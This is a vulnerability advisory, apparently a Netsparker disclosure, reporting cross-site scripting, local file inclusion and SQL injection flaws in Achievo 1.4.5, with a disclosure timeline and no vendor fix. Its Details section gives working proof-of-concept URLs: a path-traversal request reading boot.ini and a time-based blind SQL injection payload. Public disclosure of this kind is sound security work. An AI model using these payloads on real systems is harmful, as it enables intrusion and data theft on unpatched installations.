71 lines
No EOL
2.6 KiB
Text
Executable file
71 lines
No EOL
2.6 KiB
Text
Executable file
Information
|
||
--------------------
|
||
Name : XSS, LFI and SQL Injection Vulnerabilities in Achievo
|
||
Software : Achievo 1.4.5 and possibly below.
|
||
Vendor Homepage : http://www.achievo.org
|
||
Vulnerability Type : Cross-Site Scripting, Local File Inclusion and SQL
|
||
Injection
|
||
Severity : Critical
|
||
Researcher : Canberk Bolat
|
||
Advisory Reference : NS-12-016
|
||
|
||
Description
|
||
--------------------
|
||
Achievo is a flexible web-based resource management tool for business
|
||
environments. Achievo's resource management capabilities will enable
|
||
organisations to support their business processes in a simple, but
|
||
effective manner.
|
||
|
||
Details
|
||
--------------------
|
||
Achievo is affected by XSS, LFI and SQL Injection vulnerabilities in
|
||
version 1.4.5.
|
||
XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid,
|
||
atkselector, atkfilter, searchString)
|
||
LFI:
|
||
http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
|
||
SQL Injection:
|
||
http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
|
||
You can read the full article about Cross-Site Scripting, LFI and SQL
|
||
Injection vulnerabilities from here:
|
||
|
||
Cross-site Scripting (XSS):
|
||
http://www.mavitunasecurity.com/crosssite-scripting-xss/
|
||
Local File Inclusion: http://www.mavitunasecurity.com/local-file-inclusion/
|
||
Blind SQL Injection: http://www.mavitunasecurity.com/blind-sql-injection/
|
||
|
||
Solution
|
||
--------------------
|
||
-
|
||
|
||
Advisory Timeline
|
||
--------------------
|
||
23/01/2011 - First contact
|
||
25/02/2012 - Second contact - No response
|
||
01/11/2012 - Advisory released
|
||
|
||
Credits
|
||
--------------------
|
||
It has been discovered on testing of Netsparker, Web Application Security
|
||
Scanner - http://www.mavitunasecurity.com/netsparker/.
|
||
|
||
References
|
||
--------------------
|
||
Vendor Url / Patch : -
|
||
MSL Advisory Link :
|
||
http://www.mavitunasecurity.com/xss-lfi-and-sql-injection-vulnerabilities-in-achievo/
|
||
Netsparker Advisories :
|
||
http://www.mavitunasecurity.com/netsparker-advisories/
|
||
|
||
About Netsparker
|
||
--------------------
|
||
Netsparker<EFBFBD> can find and report security issues such as SQL Injection and
|
||
Cross-site Scripting (XSS) in all web applications regardless of the
|
||
platform and the technology they are built on. Netsparker's unique
|
||
detection and exploitation techniques allows it to be dead accurate in
|
||
reporting hence it's the first and the only False Positive Free web
|
||
application security scanner.
|
||
|
||
--
|
||
Netsparker Advisories, <advisories@mavitunasecurity.com>
|
||
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/ |